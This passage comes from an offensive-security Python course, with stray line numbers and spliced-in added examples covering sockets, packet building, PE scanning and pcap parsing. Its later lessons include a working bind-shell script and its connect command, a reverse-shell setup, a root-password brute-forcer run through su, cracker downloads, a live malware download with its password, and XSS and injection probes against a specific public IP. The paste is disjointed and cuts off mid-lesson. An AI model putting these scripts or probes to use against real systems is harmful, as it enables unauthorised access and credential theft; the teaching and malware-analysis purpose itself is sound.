hostport = ("127.0.0.1", 1337)
1937
s.bind(hostport)
1938
while 1:
1939
	buf, address = s.recvfrom(1024)
1940
	print buf
1941
	if buf == "Hello\n":
1942
		s.sendto("Server ID 1\n", address)
1943
1944
1945
1946
1947
1948
1949
python udpserver.py
1950
1951
1952
--open another terminal--
1953
python udpclient.py
1954
1955
1956
1957
1958
1959
1960
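The Lesson 18 and Lesson 19 exchange in one runnable Python 3 file, as an added example (this is not the course's tcpclient.py/tcpserver.py or the UDP pair). Three things differ from the scripts above: sockets carry bytes (b"Hello\n"), the servers bind to port 0 so the OS picks a free port instead of the fixed 1337, and the TCP side reads until the newline because a single recv() is not guaranteed to return a whole message. 127.0.0.1 and the messages are the constructed inputs.

```python
"""Added example: tcpserver/tcpclient and udpserver/udpclient from Lessons 18-19
in Python 3, run in one process so no second terminal is needed."""
import socket
import threading

GREETING = b"Hello\n"
SERVER_ID = b"Server ID 1\n"


def recv_line(sock, limit=1024):
    """Read from a stream socket until a newline (or EOF / limit); TCP has no message boundaries."""
    buf = b""
    while not buf.endswith(b"\n") and len(buf) < limit:
        chunk = sock.recv(limit - len(buf))
        if not chunk:            # peer closed the connection
            break
        buf += chunk
    return buf


def make_listener(kind):
    """Bind a TCP or UDP socket on 127.0.0.1 with an OS-assigned port."""
    srv = socket.socket(socket.AF_INET, kind)
    srv.bind(("127.0.0.1", 0))
    if kind == socket.SOCK_STREAM:
        srv.listen(10)
    return srv


def serve_tcp(srv, connections):
    """tcpserver.py's loop, for a fixed number of connections."""
    for _ in range(connections):
        cli, addr = srv.accept()
        with cli:
            if recv_line(cli) == GREETING:
                cli.sendall(SERVER_ID)
    srv.close()


def serve_udp(srv, datagrams):
    """udpserver.py's loop: each datagram arrives whole, with the sender's address."""
    for _ in range(datagrams):
        buf, address = srv.recvfrom(1024)
        if buf == GREETING:
            srv.sendto(SERVER_ID, address)
    srv.close()


def tcp_client(port, message):
    with socket.create_connection(("127.0.0.1", port)) as s:
        s.sendall(message)
        return recv_line(s)          # b"" if the server closed without answering


def udp_client(port, message, timeout=1.0):
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(message, ("127.0.0.1", port))
        try:
            return s.recv(1024)
        except socket.timeout:
            return None              # UDP: no reply looks exactly like a lost packet


def demo():
    """Start both servers in threads, run two clients against each, return what they got back."""
    tcp_srv, udp_srv = make_listener(socket.SOCK_STREAM), make_listener(socket.SOCK_DGRAM)
    threads = [threading.Thread(target=serve_tcp, args=(tcp_srv, 2), daemon=True),
               threading.Thread(target=serve_udp, args=(udp_srv, 2), daemon=True)]
    for t in threads:
        t.start()
    tcp_port, udp_port = tcp_srv.getsockname()[1], udp_srv.getsockname()[1]
    results = {
        "tcp_hello": tcp_client(tcp_port, GREETING),
        "tcp_other": tcp_client(tcp_port, b"Hi\n"),
        "udp_hello": udp_client(udp_port, GREETING),
        "udp_other": udp_client(udp_port, b"Hi\n", timeout=0.3),
    }
    for t in threads:
        t.join(timeout=2)
    return results


if __name__ == "__main__":
    print(demo())
```

The "other" probes show the two failure modes worth knowing when you write scanners later: a TCP server that closes without replying gives the client an empty read, while a silent UDP server gives nothing at all, which is why UDP tools need timeouts.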
###############################
# Lesson 20: Installing Scapy #
###############################

sudo apt-get update 
sudo apt-get install python-scapy python-pyx python-gnuplot


Reference Page For All Of The Commands We Will Be Running:
http://samsclass.info/124/proj11/proj17-scapy.html

Great slides for Scapy:
http://www.secdev.org/conf/scapy_csw05.pdf



To run Scapy interactively

	sudo scapy



################################################
# Lesson 21: Sending ICMPv4 Packets with scapy #
################################################

In the Linux machine, in the Terminal window, at the >>> prompt, type this command, and then press the Enter key:

    i = IP() 


This creates an object named i of type IP. To see the properties of that object, use the display() method with this command:

    i.display() 


Use these commands to set the destination IP address and display the properties of the i object again. Replace the IP address in the first command with the IP address of your target Windows machine:

    i.dst="10.65.75.49"
    i.display() 


Notice that scapy automatically fills in your machine's source IP address.

Use these commands to create an object named ic of type ICMP and display its properties:

    ic = ICMP()
    ic.display() 


Use this command to send the packet onto the network and listen to a single packet in response. Note that the third character is the numeral 1, not a lowercase L:

    sr1(i/ic) 


This command sends and receives one packet, of type IP at layer 3 and ICMP at layer 4. The response is printed, with ICMP type echo-reply. 

The Padding section shows the portion of the packet that carries higher-level data. In this case it contains only zeroes as padding.

Use this command to send a packet that is IP at layer 3, ICMP at layer 4, and that contains data with your name in it (replace YOUR NAME with your own name):

    sr1(i/ic/"YOUR NAME") 


You should see a reply with a Raw section containing your name.



##############################################
# Lesson 22: Sending a UDP Packet with Scapy #
##############################################

Preparing the Target
$ ncat -ulvp 4444



--open another terminal--
In the Linux machine, in the Terminal window, at the >>> prompt, type these commands, and then press the Enter key:

    u = UDP()
    u.display() 


This creates an object named u of type UDP, and displays its properties.

Execute these commands to change the destination port to 4444 and display the properties again:

    i.dst="10.10.2.97"				<--- replace this with a host that you can run netcat on (ex: another VM or your host computer)
    u.dport = 4444
    u.display() 


Execute this command to send the packet to the Windows machine:

    send(i/u/"YOUR NAME SENT VIA UDP\n") 


On the Windows target, you should see the message appear



#######################################
# Lesson 23: Ping Sweeping with Scapy #
#######################################


#!/usr/bin/python
from scapy.all import *

TIMEOUT = 2
conf.verb = 0
for ip in range(0, 256):
    # You will need to change 10.10.30 below to the subnet for your network
    packet = IP(dst="10.10.30." + str(ip), ttl=20)/ICMP()
    reply = sr1(packet, timeout=TIMEOUT)
    if not (reply is None):
         # reply.src is the host that answered; reply.dst would be our own address
         print reply.src, "is online"
    else:
         print "Timeout waiting for %s" % packet[IP].dst



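What the i/ic stack from Lessons 21-23 actually looks like on the wire, as an added example (not course code, and not scapy): the IPv4 and ICMP echo-request headers are packed by hand with struct, both checksums are computed, and the bytes are parsed back so you can compare the raw fields with what i.display() and ic.display() report. Nothing is sent; the addresses and the "YOUR NAME" payload are constructed sample values.

```python
"""Added example: build and decode the IPv4/ICMP echo request that
IP(dst=...)/ICMP()/"YOUR NAME" produces, without scapy."""
import socket
import struct

IPV4_FMT = "!BBHHHBBH4s4s"   # 20-byte IPv4 header without options
ICMP_FMT = "!BBHHH"          # type, code, checksum, identifier, sequence


def inet_checksum(data):
    """RFC 1071 one's-complement checksum over 16-bit big-endian words."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_icmp_echo(src, dst, payload=b"", ident=1, seq=1, ttl=64):
    """Return the bytes for IP(src, dst, ttl)/ICMP(type=echo-request)/payload."""
    # ICMP checksum covers header + payload; compute it with the field zeroed.
    icmp = struct.pack(ICMP_FMT, 8, 0, 0, ident, seq) + payload   # type 8 = echo-request
    icmp = icmp[:2] + struct.pack("!H", inet_checksum(icmp)) + icmp[4:]
    total_len = 20 + len(icmp)
    fields = [0x45, 0, total_len, 1, 0, ttl, socket.IPPROTO_ICMP, 0,
              socket.inet_aton(src), socket.inet_aton(dst)]
    fields[7] = inet_checksum(struct.pack(IPV4_FMT, *fields))    # header checksum
    return struct.pack(IPV4_FMT, *fields) + icmp


def parse_icmp_echo(pkt):
    """Decode an IPv4/ICMP packet; raise ValueError if either checksum is wrong."""
    (vihl, _tos, total_len, _id, _frag, ttl, proto, _csum,
     src, dst) = struct.unpack(IPV4_FMT, pkt[:20])
    ihl = (vihl & 0x0F) * 4
    if inet_checksum(pkt[:ihl]) != 0:          # a valid header sums to zero
        raise ValueError("bad IPv4 header checksum")
    if proto != socket.IPPROTO_ICMP:
        raise ValueError("not an ICMP packet")
    icmp = pkt[ihl:total_len]
    if inet_checksum(icmp) != 0:
        raise ValueError("bad ICMP checksum")
    typ, code, _, ident, seq = struct.unpack(ICMP_FMT, icmp[:8])
    return {"src": socket.inet_ntoa(src), "dst": socket.inet_ntoa(dst), "ttl": ttl,
            "type": typ, "code": code, "id": ident, "seq": seq, "payload": icmp[8:]}


def checksums_ok(pkt):
    """True if the packet decodes with both checksums intact."""
    try:
        parse_icmp_echo(pkt)
        return True
    except ValueError:
        return False


if __name__ == "__main__":
    pkt = build_icmp_echo("10.65.75.1", "10.65.75.49", b"YOUR NAME")
    print(pkt.hex())
    print(parse_icmp_echo(pkt))
```

The payload after the 8-byte ICMP header is the "Raw" section scapy shows in the reply; an odd-length payload is padded with one zero byte for the checksum only, which is why the Padding layer appears in some replies.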
###############################################
# Checking out some scapy based port scanners #
###############################################

wget https://s3.amazonaws.com/SecureNinja/Python/rdp_scan.py

cat rdp_scan.py

sudo python rdp_scan.py


######################################
# Dealing with conf.verb=0 NameError #
######################################

conf.verb = 0
NameError: name 'conf' is not defined

Fixing scapy - some scripts are written for the old version of scapy so you'll have to change the following line from:

from scapy import *
	to
from scapy.all import *


Reference:
http://hexale.blogspot.com/2008/10/wifizoo-and-new-version-of-scapy.html


conf.verb=0 is a verbosity setting (configuration/verbosity = conv


Here are some good Scapy references:
http://www.secdev.org/projects/scapy/doc/index.html
http://resources.infosecinstitute.com/port-scanning-using-scapy/
http://www.hackerzvoice.net/ouah/blackmagic.txt
http://www.workrobot.com/sansfire2009/SCAPY-packet-crafting-reference.html


######################################
# Lesson 24: Bind and Reverse Shells #
######################################
vi simplebindshell.py


#!/bin/python
import os,sys,socket

ls = socket.socket(socket.AF_INET,socket.SOCK_STREAM);
print '-Creating socket..'
port = 31337
try:
	ls.bind(('', port))
	print '-Binding the port on ' 
	ls.listen(1)
	print '-Listening, '
	(conn, addr) = ls.accept()
	print '-Waiting for connection...'
	cli= conn.fileno()
	print '-Redirecting shell...'
	os.dup2(cli, 0)
	print 'In, '
	os.dup2(cli, 1)
	print 'Out, '
	os.dup2(cli, 2)
	print 'Err'	
	print 'Done!'
	arg0='/bin/sh'
	arg1='-a'
	args=[arg0]+[arg1]
	os.execv(arg0, args)
except(socket.error):
	print 'fail\n'
	conn.close()
	sys.exit(1)




nc TARGETIP 31337


---------------------
Preparing the target for a reverse shell
$ ncat -lvp 4444


--open another terminal--
wget https://www.trustedsec.com/files/simple_py_shell.py

vi simple_py_shell.py



-------------------------------
Tricky shells

Reference:
http://securityweekly.com/2011/10/python-one-line-shell-code.html
http://resources.infosecinstitute.com/creating-undetectable-custom-ssh-backdoor-python-z/



#############################
# Reference Videos To Watch #
#############################
Here is your third set of youtube videos that I'd like for you to watch:
https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 21-30)



#################################################
# Lesson 25: Python Functions & String Handling #
#################################################

Python can make use of functions:
http://www.tutorialspoint.com/python/python_functions.htm


Python can interact with the 'crypt' function used to create Unix passwords:
http://docs.python.org/2/library/crypt.html


Tonight we will see a lot of the split() method so be sure to keep the following references close by:
http://www.tutorialspoint.com/python/string_split.htm

Tonight we will see a lot of slicing so be sure to keep the following references close by:
http://techearth.net/python/index.php5?title=Python:Basics:Slices



################################
# Lesson 26: Password Cracking #
################################

wget https://s3.amazonaws.com/SecureNinja/Python/htcrack.py

vi htcrack.py

vi list.txt

hello
goodbye
red
blue
yourname
tim
bob


htpasswd -nd yourname
	- enter yourname as the password


python htcrack.py joe:7XsJIbCFzqg/o list.txt



sudo apt-get install -y python-mechanize python-pexpect python-pexpect-doc

rm -rf mechanize-0.2.5.tar.gz

sudo /bin/bash

passwd
	***set root password***



vi rootbrute.py


#!/usr/bin/env python

import sys
try:
        import pexpect
except(ImportError):
        print "\nYou need the pexpect module."
        print "http://www.noah.org/wiki/Pexpect\n"
        sys.exit(1)

#Change this if needed.
# LOGIN_ERROR = 'su: incorrect password'
LOGIN_ERROR = "su: Authentication failure"

def brute(word):
        print "Trying:",word
        child = pexpect.spawn('/bin/su')
        child.expect('Password: ')
        child.sendline(word)
        i = child.expect (['.+\s#\s',LOGIN_ERROR, pexpect.TIMEOUT],timeout=3)
        if i == 1:
                print "Incorrect Password"

        if i == 2:
                print "\n\t[!] Root Password:" ,word
                child.sendline ('id')
                print child.before
                child.interact()

if len(sys.argv) != 2:
        print "\nUsage : ./rootbrute.py <wordlist>"
        print "Eg: ./rootbrute.py words.txt\n"
        sys.exit(1)

try:
        words = open(sys.argv[1], "r").readlines()
except(IOError):
        print "\nError: Check your wordlist path\n"
        sys.exit(1)

print "\n[+] Loaded:",len(words),"words"
print "[+] BruteForcing...\n"
for word in words:
        brute(word.replace("\n",""))



References you might find helpful:
http://stackoverflow.com/questions/15026536/looping-over-a-some-ips-from-a-file-in-python




wget https://s3.amazonaws.com/SecureNinja/Python/md5crack.py

vi md5crack.py



Why use hexdigest
http://stackoverflow.com/questions/3583265/compare-result-from-hexdigest-to-a-string


http://md5online.net/



wget https://s3.amazonaws.com/SecureNinja/Python/wpbruteforcer.py



#############################
# Reference Videos To Watch #
#############################
Here is your fourth set of youtube videos that I'd like for you to watch:
https://www.youtube.com/playlist?list=PLEA1FEF17E1E5C0DA (watch videos 31-40)




###############################
# Lesson 28: Malware Analysis #
###############################



############################
# Download the Analysis VM #
############################
https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
user:      infosecaddicts
pass:      infosecaddicts


- Log in to your Ubuntu system with the username 'malware' and the password 'malware'.

- After logging in, please open a terminal window and type the following commands:

cd Desktop/


- This is actual Malware (remember to run it in a VM; the password to extract it is 'infected'):

wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip
wget https://s3.amazonaws.com/StrategicSec-Files/analyse_malware.py

unzip malware-password-is-infected.zip
    infected

file malware.exe

mv malware.exe malware.pdf

file malware.pdf

mv malware.pdf malware.exe

hexdump -n 2 -C malware.exe

***What is '4d 5a' or 'MZ'***
Reference:
http://www.garykessler.net/library/file_sigs.html


objdump -x malware.exe

strings malware.exe

strings --all malware.exe | head -n 6

strings malware.exe | grep -i dll

strings malware.exe | grep -i library

strings malware.exe | grep -i reg

strings malware.exe | grep -i hkey

strings malware.exe | grep -i hku

                            - We didn't see anything like HKLM, HKCU or other registry type stuff

strings malware.exe | grep -i irc

strings malware.exe | grep -i join

strings malware.exe | grep -i admin

strings malware.exe | grep -i list


                            - List of IRC commands: https://en.wikipedia.org/wiki/List_of_Internet_Relay_Chat_commands

sudo apt-get install -y python-pefile

vi analyse_malware.py

python analyse_malware.py malware.exe




Building a Malware Scanner
--------------------------

mkdir ~/Desktop/malwarescanner

cd ~/Desktop/malwarescanner

wget https://github.com/jonahbaron/malwarescanner/archive/master.zip

unzip master.zip

cd malwarescanner-master/

python scanner.py -h

cat strings.txt

cat hashes.txt

mkdir ~/Desktop/malcode

cp ~/Desktop/malware.exe ~/Desktop/malcode

python scanner.py -H hashes.txt -D /home/malware/Desktop/malcode/ strings.txt

cp ~/Desktop/



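The three checks above (the '4d 5a' / 'MZ' signature from the hexdump, the `strings | grep -i` triage, and scanner.py's hashes.txt / strings.txt matching) done in one Python 3 script, as an added example; this is not the course's analyse_malware.py, pefile, or the malwarescanner project. The file it scans is a constructed stub with a valid DOS/PE header and a few planted strings, not the malware.exe sample, and the "known bad" hash set is seeded with the stub's own digest so the match path is exercised.

```python
"""Added example: MZ/PE signature check, strings extraction, and hash/IOC
matching on a constructed PE stub (no real malware involved)."""
import hashlib
import re
import struct


def pe_header(data):
    """Return the COFF header fields if data has a valid MZ/PE pair, else None."""
    if len(data) < 0x40 or data[:2] != b"MZ":           # '4d 5a' from the hexdump
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]   # offset of the PE header
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        return None
    machine, nsections, timestamp = struct.unpack_from("<HHI", data, e_lfanew + 4)
    return {"machine": machine, "sections": nsections, "timestamp": timestamp}


def ascii_strings(data, minlen=4):
    """Roughly what `strings` prints: runs of printable ASCII of at least minlen bytes."""
    return [m.group().decode("ascii")
            for m in re.finditer(rb"[\x20-\x7e]{%d,}" % minlen, data)]


def scan(data, bad_hashes, ioc_strings):
    """Hash the file, look it up in bad_hashes, and grep its strings for each IOC (case-insensitive)."""
    digests = {name: hashlib.new(name, data).hexdigest() for name in ("md5", "sha1", "sha256")}
    found = ascii_strings(data)
    hits = sorted({ioc for ioc in ioc_strings
                   if any(ioc.lower() in s.lower() for s in found)})
    return {"pe": pe_header(data), "hashes": digests,
            "hash_match": any(d in bad_hashes for d in digests.values()),
            "string_hits": hits, "strings": found}


def make_stub():
    """Constructed sample: DOS header -> PE header with three sections, plus planted strings."""
    dos = bytearray(b"MZ" + b"\x00" * 62)
    struct.pack_into("<I", dos, 0x3C, 0x40)                                   # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x14C, 3, 0x4F5E2C00, 0, 0, 0xE0, 0x102)  # i386, 3 sections
    body = (b"\x00" * 16 + b"kernel32.dll\x00" + b"LoadLibraryA\x00"
            + b"NICK stub_\x00" + b"JOIN #constructed\x00" + b"\x00" * 8)
    return bytes(dos) + b"PE\x00\x00" + coff + body


if __name__ == "__main__":
    stub = make_stub()
    known_bad = {scan(stub, set(), [])["hashes"]["md5"]}
    print(scan(stub, known_bad, ["dll", "join", "hkey", "admin"]))
```

Renaming the file, as the `mv malware.exe malware.pdf` step shows, changes nothing here: the verdict comes from the first two bytes and the e_lfanew pointer, not the extension.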
#####################################################
# Analyzing Macro Embedded Malware                  #
# Reference:                                        #
# https://jon.glass/analyzes-dridex-malware-p1/     #
#####################################################
cp ~/Desktop/

- Create a FREE account on:
https://malwr.com/account/signup/

- Grab the malware from:
https://malwr.com/analysis/MzkzMTk3MzBlZGQ2NDRhY2IyNTc0MGI5MWQwNzEwZmQ/

file ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin

cat ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin



sudo pip install olefile

mkdir ~/Desktop/oledump

cd ~/Desktop/oledump

wget http://didierstevens.com/files/software/oledump_V0_0_22.zip

unzip oledump_V0_0_22.zip

cp ~/Downloads/f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin .

mv f9b874f9ccf803abaeaaf7af93523ee140f1929837f267378c89ed7b5bf174bf.bin 064016.doc

python oledump.py 064016.doc

python oledump.py 064016.doc -s A4 -v

- From this we can see this Word doc contains an embedded file called editdata.mso which contains seven data streams.
- Three of the data streams are flagged as macros: A3:'VBA/Module1', A4:'VBA/Module2', A5:'VBA/ThisDocument'.


python oledump.py 064016.doc -s A5 -v

- As far as I can tell, VBA/Module2 does absolutely nothing. These are nonsensical functions designed to confuse heuristic scanners.


python oledump.py 064016.doc -s A3 -v

- Look for "GVhkjbjv" and you should see:


- Take that long blob that starts with 636D and finishes with 653B and paste it in:
http://www.rapidtables.com/convert/number/hex-to-ascii.htm



##############
# Yara Ninja #
##############
cd ~/Desktop

sudo apt-get remove -y yara

wget https://github.com/plusvic/yara/archive/v3.4.0.zip

sudo apt-get -y install libtool

unzip v3.4.0.zip

cd yara-3.4.0

./bootstrap.sh

./configure

make

sudo make install

yara -v

cd ..

wget https://github.com/Yara-Rules/rules/archive/master.zip

unzip master.zip

cd ~/Desktop

yara rules-master/packer.yar malcode/malware.exe


Places to get more Yara rules:
------------------------------
https://malwareconfig.com/static/yaraRules/
https://github.com/kevthehermit/YaraRules
https://github.com/VectraThreatLab/reyara



Yara rule sorting script:
-------------------------
https://github.com/mkayoh/yarasorter



cd ~/Desktop/rules-master
for i in $( ls --hide=master.yar ); do echo include \"$i\";done > master.yar
cd ~/Desktop/
yara rules-master/master.yar malcode/malware.exe



Here is a 2 million sample malware DB created by Derek Morton that you can use to start your DB with:
http://derekmorton.name/files/malware_12-14-12.sql.bz2


Malware Repositories:
http://malshare.com/index.php
http://www.malwareblacklist.com/
http://www.virusign.com/
http://virusshare.com/
http://www.tekdefense.com/downloads/malware-samples/



###############################
# Creating a Malware Database #
###############################

Creating a malware database (sqlite)
------------------------------------
sudo apt-get install -y python-simplejson python-simplejson-dbg
wget https://malwarecookbook.googlecode.com/svn/trunk/4/4/avsubmit.py
wget https://s3.amazonaws.com/StrategicSec-Files/MalwareAnalysis/malware-password-is-infected.zip
unzip malware-password-is-infected.zip
    infected
python avsubmit.py --init
python avsubmit.py -f malware.exe -e




Creating a malware database (mysql)
-----------------------------------
- Step 1: Installing MySQL database
- Run the following command in the terminal:

sudo apt-get install mysql-server

- Step 2: Installing Python MySQLdb module
- Run the following command in the terminal:

sudo apt-get build-dep python-mysqldb
sudo apt-get install python-mysqldb

- Step 3: Logging in
- Run the following command in the terminal:

mysql -u root -p                    (set a password of 'malware')

- Then create one database by running following command:

create database malware;

exit;

wget https://raw.githubusercontent.com/dcmorton/MalwareTools/master/mal_to_db.py

vi mal_to_db.py                     (fill in database connection information)

python mal_to_db.py -i

python mal_to_db.py -f malware.exe -u


mysql -u root -p
    malware

mysql> use malware;

select id,md5,sha1,sha256,time FROM files;

mysql> quit;



2716
######################################
2717
# PCAP Analysis with forensicPCAP.py #
2718
######################################
2719
cd ~/Desktop
2720
wget https://raw.githubusercontent.com/madpowah/ForensicPCAP/master/forensicPCAP.py
2721
sudo easy_install cmd2
2722
 
2723
python forensicPCAP.py Browser\ Forensics/suspicious-time.pcap
2724
 
2725
ForPCAP >>> help
2726
 
2727
 
2728
Prints stats about PCAP
2729
ForPCAP >>> stat
2730
 
2731
 
2732
Prints all DNS requests from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
2733
ForPCAP >>> dns
2734
 
2735
ForPCAP >>> show
2736
 
2737
 
2738
Prints all destination ports from the PCAP file. The id before the DNS is the packet's id which can be use with the "show" command.
2739
ForPCAP >>> dstports
2740
 
2741
ForPCAP >>> show
2742
 
2743
 
2744
Prints the number of ip source and store them.
2745
ForPCAP >>> ipsrc
2746
 
2747
 
2748
Prints the number of web's requests and store them
2749
ForPCAP >>> web
2750
 
2751
 
2752
Prints the number of mail's requests and store them
2753
ForPCAP >>> mail
2754
 
2755
 
2756
 
2757
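A pcap reader written with struct only, as an added example (not the course's pcapparsing.py and not forensicPCAP.py), so it runs without pcapy, dpkt or cmd2. It does what the homework earlier on this page asks (timestamp, source and destination IP, source and destination port for each packet) and what forensicPCAP's `dstports` command reports. The capture is constructed in code: one DNS query and two TCP SYNs from a made-up host, with the IP checksums left at zero since the parser does not verify them.

```python
"""Added example: parse a pcap file (global header + per-record headers +
Ethernet/IPv4/TCP|UDP) and summarise it the way the homework and
forensicPCAP's dstports do.  Python 3, standard library only."""
import socket
import struct
from collections import Counter

PCAP_MAGIC_LE, PCAP_MAGIC_BE = 0xA1B2C3D4, 0xD4C3B2A1
LINKTYPE_ETHERNET = 1
PROTO_NAMES = {1: "icmp", 6: "tcp", 17: "udp"}


def parse_frame(frame):
    """Ethernet -> IPv4 -> TCP/UDP ports; returns None for non-IPv4 frames."""
    if len(frame) < 34 or frame[12:14] != b"\x08\x00":   # EtherType 0x0800 = IPv4
        return None
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4                              # header length incl. options
    proto = ip[9]
    rec = {"proto": PROTO_NAMES.get(proto, str(proto)),
           "src": socket.inet_ntoa(ip[12:16]), "dst": socket.inet_ntoa(ip[16:20]),
           "sport": None, "dport": None}
    l4 = ip[ihl:]
    if proto in (6, 17) and len(l4) >= 4:                 # TCP and UDP both start with sport, dport
        rec["sport"], rec["dport"] = struct.unpack("!HH", l4[:4])
    return rec


def parse_pcap(blob):
    """Walk the pcap global header and every record; return the decoded packets in order."""
    magic = struct.unpack("<I", blob[:4])[0]
    if magic == PCAP_MAGIC_LE:
        end = "<"
    elif magic == PCAP_MAGIC_BE:
        end = ">"
    else:
        raise ValueError("not a pcap file (magic %#x)" % magic)
    linktype = struct.unpack(end + "IHHiIII", blob[:24])[6]
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet link type handled")
    records, off = [], 24
    while off + 16 <= len(blob):
        sec, usec, incl_len, _orig_len = struct.unpack(end + "IIII", blob[off:off + 16])
        off += 16
        rec = parse_frame(blob[off:off + incl_len])
        off += incl_len
        if rec:
            rec.update(ts_sec=sec, ts_usec=usec, timestamp=sec + usec / 1e6)
            records.append(rec)
    return records


def summary_lines(records):
    """The homework's output: timestamp, src IP:port -> dst IP:port, one line per packet."""
    return ["%d.%06d %s %s:%s -> %s:%s" % (r["ts_sec"], r["ts_usec"], r["proto"],
            r["src"], r["sport"], r["dst"], r["dport"]) for r in records]


def dst_ports(records):
    """forensicPCAP-style dstports: how often each destination port was seen."""
    return Counter(r["dport"] for r in records if r["dport"] is not None)


# --- constructed capture (not a real pcap from the course) -------------------
def _frame(src, dst, proto, payload):
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64, proto, 0,
                     socket.inet_aton(src), socket.inet_aton(dst))
    return b"\x00\x11\x22\x33\x44\x55\x66\x77\x88\x99\xaa\xbb\x08\x00" + ip + payload


def _tcp_syn(sport, dport):
    return struct.pack("!HHIIBBHHH", sport, dport, 0, 0, 0x50, 0x02, 65535, 0, 0)


def build_sample_pcap():
    dns_query = struct.pack("!HHHH", 53211, 53, 8 + 12, 0) + b"\x12\x34\x01\x00\x00\x01" + b"\x00" * 6
    frames = [(1429372800, 123, _frame("192.168.1.10", "8.8.8.8", 17, dns_query)),
              (1429372800, 250000, _frame("192.168.1.10", "93.184.216.34", 6, _tcp_syn(49152, 80))),
              (1429372801, 0, _frame("192.168.1.10", "93.184.216.34", 6, _tcp_syn(49153, 443)))]
    out = struct.pack("<IHHiIII", PCAP_MAGIC_LE, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for sec, usec, frame in frames:
        out += struct.pack("<IIII", sec, usec, len(frame), len(frame)) + frame
    return out


if __name__ == "__main__":
    recs = parse_pcap(build_sample_pcap())
    print("\n".join(summary_lines(recs)))
    print(dst_ports(recs))
```

Two details the dpkt version hides: the record timestamp is two 32-bit integers (seconds and microseconds) whose byte order follows the file's magic number, and the IPv4 header length must be read from the IHL nibble rather than assumed to be 20, or any packet carrying IP options will have its ports read from the wrong offset.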
###################
# Memory Analysis #
###################
cd /home/malware/Desktop/Banking\ Troubles/Volatility

python volatility
python volatility pslist -f ../hn_forensics.vmem
python volatility connscan2 -f ../hn_forensics.vmem
python volatility memdmp -p 888 -f ../hn_forensics.vmem
python volatility memdmp -p 1752 -f ../hn_forensics.vmem
                ***Takes a few min***
strings 1752.dmp | grep "^http://" | sort | uniq
strings 1752.dmp | grep "Ahttps://" | uniq -u
cd ..
foremost -i ../Volatility/1752.dmp -t pdf -o output/pdf2
cd /home/malware/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf2/
cat audit.txt
cd pdf
ls
grep -i javascript *.pdf



cd /home/malware/Desktop/Banking\ Troubles/foremost-1.5.7/output/pdf5/pdf
wget http://didierstevens.com/files/software/pdf-parser_V0_6_4.zip
unzip pdf-parser_V0_6_4.zip
python pdf-parser.py -s javascript --raw 00600328.pdf
python pdf-parser.py --object 11 00600328.pdf
python pdf-parser.py --object 1054 --raw --filter 00600328.pdf > malicious.js

cat malicious.js


*****Sorry - no time to cover javascript de-obfuscation today*****


cd /home/malware/Desktop/Banking\ Troubles/Volatility/
python volatility files -f ../hn_forensics.vmem > files
cat files | less
python volatility malfind -f ../hn_forensics.vmem -d out
ls out/
python volatility hivescan -f ../hn_forensics.vmem
python volatility printkey -o 0xe1526748 -f ../hn_forensics.vmem Microsoft "Windows NT" CurrentVersion Winlogon
for file in $(ls *.dmp); do echo $file; strings $file | grep bankofamerica; done



Start with simple Firefox Addons:

- ShowIP            https://addons.mozilla.org/en-US/firefox/addon/showip/
- Server Spy        https://addons.mozilla.org/en-US/firefox/addon/server-spy/
- FoxyProxy         https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/
- Tamper Data       https://addons.mozilla.org/en-US/firefox/addon/tamper-data/
- Wappalyzer        https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/

A good list of web app testing add ons for Firefox:
https://addons.mozilla.org/en-us/firefox/collections/adammuntner/webappsec/




##################################
2822
# Basic: Web Application Testing #
2823
##################################
2824
 
2825
Most people are going to tell you reference the OWASP Testing guide.
2826
https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
2827
 
2828
I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website.
2829
 
2830
 
2831
The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.
2832
   
2833
    1. Does the website talk to a DB?
2834
        - Look for parameter passing (ex: site.com/page.php?id=4)
2835
        - If yes - try SQL Injection
2836
 
2837
    2. Can I or someone else see what I type?
2838
        - If yes - try XSS
2839
 
2840
    3. Does the page reference a file?
2841
        - If yes - try LFI/RFI
2842
 
2843
Let's start with some manual testing against 54.149.82.150
2844
 
2845
 
2846
Start here:
2847
http://54.149.82.150/
2848
 
2849
 
2850
There's no parameter passing on the home page so the answer to question 1 is NO.
2851
There is however a search box in the top right of the webpage, so the answer to question 2 is YES.
2852
 
2853
Try an XSS in the search box on the home page:
2854
<script>alert(123);</script>
2855
 
2856
Doing this gives us the following in the address bar:
2857
http://54.149.82.150/BasicSearch.aspx?Word=<script>alert(123);</script>
2858
 
2859
Ok, so we've verified that there is XSS in the search box.
2860
 
2861
Let's move on to the search box in the left of the page.
2862
 
2863
Let's give the newsletter signup box a shot
2864
 
2865
Moving on to the login page.
2866
http://54.149.82.150/login.aspx
2867
 
2868
I entered a single quote (') for both the user name and the password. I got the following error:
2869
 
2870
-----------------------------------------------------------------
2871
 'Users//User[@Name=''' and @Password=''']' has an invalid token.
2872
Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
2873
 
2874
